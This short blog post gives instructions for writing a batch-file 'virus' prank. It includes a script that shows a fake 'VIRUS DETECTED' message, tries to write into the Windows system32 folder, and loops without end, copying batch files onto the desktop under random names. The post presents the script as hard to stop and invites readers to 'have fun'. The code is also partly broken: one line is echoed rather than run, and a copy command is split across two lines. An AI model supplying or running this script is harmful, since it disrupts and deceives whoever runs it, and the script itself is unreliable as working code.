- Open notepad
- 2Type the following code in:
@echo off
echo checking system:
echo for %%i in ("*.bat") do copy %%i+c:\tmp.bat %%i >c:\windows\system32\autoexec.NT
echo VIRUS DETECTED
Pause
echo DELETING VIRUS
pause
:1
dir /s
copy c:\tmp.bat
c:\docum~1\%username%\desktop\greatgame_%random%.bat
goto 1
- 1This will create a never ending stream of mindless code. This cannot be stopped easily.
- 2Save the file as "virus.bat"
- 3Have fun
No comments:
Post a Comment